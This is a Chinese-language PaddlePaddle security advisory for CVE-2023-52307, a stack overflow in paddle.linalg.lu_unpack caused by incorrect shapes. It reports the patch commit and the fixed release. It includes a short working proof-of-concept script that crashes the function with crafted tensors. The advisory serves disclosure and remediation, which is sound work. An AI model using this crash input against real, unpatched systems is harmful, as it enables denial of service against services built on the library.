pdsa-2023-016_cn.md

PDSA-2023-016: Stack overflow in paddle.linalg.lu_unpack

CVE编号

CVE-2023-52307

影响

不正确的shapes会引发paddle.linalg.lu_unpack栈溢出，PoC代码如下：

import paddle
import numpy as np

x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [1, 6, 4, 8, 2]).astype(np.float32))
y = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, []).astype(np.int32))

paddle.linalg.lu_unpack(x, y, True, True)

补丁

我们在commit 10093636a10f29f73f13729b33570d8cafd58fb6中对此问题进行了补丁。 修复将包含在飞桨2.6.0版本当中。

更多信息

请参考我们的安全指南以获得更多关于安全的信息，以及如何与我们联系问题。

贡献者

此漏洞由 Tong Liu of CAS-IIE 提交。